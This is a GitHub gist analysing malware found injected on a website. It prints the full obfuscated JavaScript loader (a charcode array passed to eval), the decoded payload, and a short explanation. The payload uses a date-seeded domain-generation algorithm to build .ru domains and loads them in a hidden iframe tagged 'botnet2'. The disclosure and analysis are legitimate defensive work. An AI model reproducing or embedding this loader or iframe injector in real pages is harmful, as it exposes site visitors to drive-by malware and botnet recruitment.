Skip to content

Instantly share code, notes, and snippets.

@julescarbon

julescarbon/gist:0b22271284aff79d863d

Created May 9, 2014 16:22
Show Gist options
  • Save julescarbon/0b22271284aff79d863d to your computer and use it in GitHub Desktop.
Save julescarbon/0b22271284aff79d863d to your computer and use it in GitHub Desktop.
Download ZIP
jograham.com mal
Raw
gistfile1.txt
try {
prototype % 2;
} catch (asd) {
x = 2;
}
try {
q = document[(x) ? "c" + "r" :
2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" +
((f) ? "e" + "n" + "t" : "")]("p");
q.appendChild(q + "");
} catch (fwbewe) {
i = 0;
try {
prototype * 5;
} catch (z) {
fr = "fromChar";
f = [510, 702, 550, 594, 580, 630, 555, 660, 160,
660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50,
192, 160, 192, 160, 708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505,
606, 500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590, 582, 570,
192, 540, 666, 160, 366, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 222, 160, 696, 520,
630, 575, 276, 405, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 696, 505, 690, 580, 192, 305,
192, 580, 624, 525, 690, 230, 390, 160, 252, 160, 648, 555, 192, 225, 192, 580, 624, 525, 690, 230,
492, 160, 252, 160, 624, 525, 354, 50, 192, 160, 192, 160, 630, 510, 240, 580, 606, 575, 696, 160,
372, 160, 288, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 696, 520, 630, 575, 276, 575,
606, 505, 600, 160, 366, 160, 696, 505, 690, 580, 354, 50, 192, 160, 192, 160, 750, 160, 606, 540,
690, 505, 192, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 580, 624, 525, 690, 230, 690, 505,
606, 500, 192, 305, 192, 580, 606, 575, 696, 160, 258, 160, 696, 520, 630, 575, 276, 385, 354, 50,
192, 160, 192, 160, 750, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 200, 696, 520,
630, 575, 276, 575, 606, 505, 600, 160, 252, 160, 696, 520, 630, 575, 276, 555, 660, 505, 474, 590,
606, 570, 462, 205, 354, 50, 750, 50, 60, 510, 702, 550, 594, 580, 630, 555, 660, 160, 492, 485, 660,
500, 666, 545, 468, 585, 654, 490, 606, 570, 426, 505, 660, 505, 684, 485, 696, 555, 684, 200, 702,
550, 630, 600, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 500, 192, 305, 192, 550, 606,
595, 192, 340, 582, 580, 606, 200, 702, 550, 630, 600, 252, 245, 288, 240, 288, 205, 354, 50, 192,
160, 192, 160, 708, 485, 684, 160, 690, 160, 366, 160, 600, 230, 618, 505, 696, 360, 666, 585, 684,
575, 240, 205, 192, 310, 192, 245, 300, 160, 378, 160, 294, 160, 348, 160, 288, 295, 60, 160, 192,
160, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 305, 192, 250, 306, 260, 318, 270, 330,
280, 342, 240, 294, 160, 258, 160, 240, 500, 276, 515, 606, 580, 462, 555, 660, 580, 624, 200, 246,
160, 252, 160, 288, 600, 420, 350, 420, 350, 420, 350, 246, 160, 258, 160, 240, 500, 276, 515, 606,
580, 408, 485, 696, 505, 240, 205, 192, 210, 192, 240, 720, 350, 420, 350, 420, 205, 258, 160, 240,
385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200, 690, 160, 252, 160, 288, 600, 420, 350, 420,
205, 246, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 390, 160, 366, 160, 312, 280, 300,
275, 294, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 462, 160, 366, 160, 300, 245, 312,
275, 312, 280, 306, 270, 312, 275, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 405, 192,
305, 192, 580, 624, 525, 690, 230, 462, 160, 282, 160, 696, 520, 630, 575, 276, 325, 354, 50, 192,
160, 192, 160, 696, 520, 630, 575, 276, 410, 192, 305, 192, 580, 624, 525, 690, 230, 462, 160, 222,
160, 696, 520, 630, 575, 276, 325, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 555, 660,
505, 474, 590, 606, 570, 462, 160, 366, 160, 294, 230, 288, 160, 282, 160, 696, 520, 630, 575, 276,
385, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 550, 606, 600, 696, 160, 366, 160, 660,
505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 354, 50, 192, 160, 192,
160, 684, 505, 696, 585, 684, 550, 192, 580, 624, 525, 690, 295, 60, 625, 60, 50, 612, 585, 660,
495, 696, 525, 666, 550, 192, 495, 684, 505, 582, 580, 606, 410, 582, 550, 600, 555, 654, 390, 702,
545, 588, 505, 684, 200, 684, 220, 192, 385, 630, 550, 264, 160, 462, 485, 720, 205, 738, 50, 192, 160,
192, 160, 684, 505, 696, 585, 684, 550, 192, 385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200,
240, 385, 582, 600, 270, 385, 630, 550, 246, 160, 252, 160, 684, 230, 660, 505, 720, 580, 240, 205,
192, 215, 192, 385, 630, 550, 246, 295, 60, 625, 60, 50, 612, 585, 660, 495, 696, 525, 666, 550, 192,
515, 606, 550, 606, 570, 582, 580, 606, 400, 690, 505, 702, 500, 666, 410, 582, 550, 600, 555, 654,
415, 696, 570, 630, 550, 618, 200, 702, 550, 630, 600, 264, 160, 648, 505, 660, 515, 696, 520, 264,
160, 732, 555, 660, 505, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 570, 582, 550, 600,
160, 366, 160, 660, 505, 714, 160, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 426,
505, 660, 505, 684, 485, 696, 555, 684, 200, 702, 550, 630, 600, 246, 295, 60, 160, 192, 160, 192,
590, 582, 570, 192, 540, 606, 580, 696, 505, 684, 575, 192, 305, 192, 455, 234, 485, 234, 220, 234,
490, 234, 220, 234, 495, 234, 220, 234, 500, 234, 220, 234, 505, 234, 220, 234, 510, 234, 220, 234,
515, 234, 220, 234, 520, 234, 220, 234, 525, 234, 220, 234, 530, 234, 220, 234, 535, 234, 220, 234,
540, 234, 220, 234, 545, 234, 220, 234, 550, 234, 220, 234, 555, 234, 220, 234, 560, 234, 220, 234,
565, 234, 220, 234, 570, 234, 220, 234, 575, 234, 220, 234, 580, 234, 220, 234, 585, 234, 220, 234,
590, 234, 220, 234, 595, 234, 220, 234, 600, 234, 220, 234, 605, 234, 220, 234, 610, 234, 465, 354,
50, 192, 160, 192, 160, 708, 485, 684, 160, 690, 580, 684, 160, 366, 160, 234, 195, 354, 50, 192,
160, 192, 160, 612, 555, 684, 200, 708, 485, 684, 160, 630, 160, 366, 160, 288, 295, 192, 525, 192,
300, 192, 540, 606, 550, 618, 580, 624, 295, 192, 525, 192, 215, 258, 160, 246, 615, 60, 160, 192,
160, 192, 160, 192, 160, 192, 575, 696, 570, 192, 215, 366, 160, 648, 505, 696, 580, 606, 570, 690,
455, 594, 570, 606, 485, 696, 505, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240,
570, 582, 550, 600, 220, 192, 240, 264, 160, 648, 505, 696, 580, 606, 570, 690, 230, 648, 505, 660,
515, 696, 520, 192, 225, 192, 245, 246, 465, 354, 50, 192, 160, 192, 160, 750, 50, 192, 160, 192,
160, 684, 505, 696, 585, 684, 550, 192, 575, 696, 570, 192, 215, 192, 195, 276, 195, 192, 215, 192,
610, 666, 550, 606, 295, 60, 625, 60, 50, 690, 505, 696, 420, 630, 545, 606, 555, 702, 580, 240, 510,
702, 550, 594, 580, 630, 555, 660, 200, 246, 615, 60, 160, 192, 160, 192, 580, 684, 605, 738, 50,
192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 240, 580, 726, 560, 606, 555, 612, 160, 630, 510,
684, 485, 654, 505, 522, 485, 690, 335, 684, 505, 582, 580, 606, 500, 192, 305, 366, 160, 204, 585,
660, 500, 606, 510, 630, 550, 606, 500, 204, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160,
192, 160, 192, 160, 630, 510, 684, 485, 654, 505, 522, 485, 690, 335, 684, 505, 582, 580, 606, 500,
192, 305, 192, 580, 684, 585, 606, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160,
192, 590, 582, 570, 192, 585, 660, 525, 720, 160, 366, 160, 462, 485, 696, 520, 276, 570, 666, 585,
660, 500, 240, 215, 660, 505, 714, 160, 408, 485, 696, 505, 240, 205, 282, 245, 288, 240, 288, 205,
354, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 708, 485, 684, 160, 600, 555,
654, 485, 630, 550, 468, 485, 654, 505, 192, 305, 192, 515, 606, 550, 606, 570, 582, 580, 606, 400,
690, 505, 702, 500, 666, 410, 582, 550, 600, 555, 654, 415, 696, 570, 630, 550, 618, 200, 702, 550,
630, 600, 264, 160, 294, 270, 264, 160, 234, 570, 702, 195, 246, 295, 60, 160, 192, 160, 192, 160,
192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 160, 366, 160, 600, 555, 594, 585, 654, 505,
660, 580, 276, 495, 684, 505, 582, 580, 606, 345, 648, 505, 654, 505, 660, 580, 240, 170, 438, 350,
492, 325, 462, 345, 204, 205, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160,
192, 525, 612, 570, 654, 230, 690, 505, 696, 325, 696, 580, 684, 525, 588, 585, 696, 505, 240, 170,
690, 570, 594, 170, 264, 160, 204, 520, 696, 580, 672, 290, 282, 235, 204, 215, 600, 555, 654, 485,
630, 550, 468, 485, 654, 505, 258, 170, 282, 570, 702, 550, 612, 555, 684, 505, 690, 580, 684, 585,
660, 315, 690, 525, 600, 305, 588, 555, 696, 550, 606, 580, 300, 170, 246, 295, 192, 50, 192, 160,
192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 684, 545, 276, 575, 696, 605, 648, 505,
276, 595, 630, 500, 696, 520, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160,
192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230,
624, 505, 630, 515, 624, 580, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160,
192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230,
708, 525, 690, 525, 588, 525, 648, 525, 696, 605, 192, 305, 192, 170, 624, 525, 600, 500, 606, 550,
204, 295, 192, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 600, 555, 594, 585,
654, 505, 660, 580, 276, 490, 666, 500, 726, 230, 582, 560, 672, 505, 660, 500, 402, 520, 630, 540,
600, 200, 630, 510, 684, 545, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160,
192, 160, 192, 625, 594, 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240,
288, 205, 354
];
v = "eva";
}
if (v) e = window[v + "l"];
w = f;
s = [];
r = String;
z = ((e) ? "Code" : "");
for (; 1776 - 5 + 5 > i; i += 1) {
j = i;
if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
}
if (f) e(s);
}
@julescarbon
Copy link
Author 

s = ""
for (i = 0; i < 1776; i++) {
    s = s + String.fromCharCode( f[i] / (5 + (i%2)) )
}

@julescarbon
Copy link
Author 

function nextRandomNumber(){
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if(test > 0){
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix){
    var d = new Date(unix*1000);
    var s = d.getHours() > 12 ? 1 : 0;
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this;
}

function createRandomNumber(r, Min, Max){
    return Math.round((Max-Min) * r.next() + Min);
}

function generatePseudoRandomString(unix, length, zone){
    var rand = new RandomNumberGenerator(unix);
    var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
    var str = '';
    for(var i = 0; i < length; i ++ ){
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }
    return str + '.' + zone;
}

setTimeout(function(){
    try{
        if(typeof iframeWasCreated == "undefined"){
            iframeWasCreated = true;
            var unix = Math.round(+new Date()/1000);
            var domainName = generatePseudoRandomString(unix, 16, 'ru');
            ifrm = document.createElement("IFRAME"); 
            ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2"); 
            ifrm.style.width = "0px"; 
            ifrm.style.height = "0px"; 
            ifrm.style.visibility = "hidden"; 
            document.body.appendChild(ifrm);
        }
    }catch(e){}
}, 500);

@julescarbon
Copy link
Author

This malware, found on jograham.com, detangles an encrypted Javascript string, and evaluates it. The resulting program "randomly" generates a Russian domain name which ostensibly loads malware into a hidden iframe. The RNG has been modified so it uses the same seed for each 12 hour period (i.e. the getHours < 12 ? 0 : 1 line which creates the seed). Thus the random domain name changes every 12 hours. You can see this behavior by loading just the RNG functions and running the following snippet:

for (var i = 0; i < 72; i++) {
  var unix = Math.round(+new Date()/1000) + 3600*i;
  var domainName = generatePseudoRandomString(unix, 16, 'ru');
  console.log(domainName)
}

Emits:

qhcplcuugevvyham.ru
tmrtbcienxrbnsjc.ru
dueebwwdllfburag.ru
fzsirujgdbvabrjm.ru
pghnrmkoeoetfwsm.ru
rlvqmipovrqbmvqd.ru
ctjbmgjudwisgshv.ru

However, none of these domains are listed in WHOIS. Since the RNG exhausts 60 domains a month, it's likely that the mal was never intended to function for very long. Based on crawls on archive.org, it appears the mal was injected in the second half of 2012. This implies that some ~1500 potential domains have been generated by the mal since the original injection two years ago.

A cursory googling of the magic numbers employed indicates that the RNG is a textbook Linear Congruential Engine. The webpage gecode.com notes: "While this pseudo-random number generator is not a good source of randomness, it is still an acceptable choice for many applications. The choice of values is taken from D. E. Knuth, The Art of Computer Programming, Vol 2, Seminumerical Algorithms, 3rd edition."

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment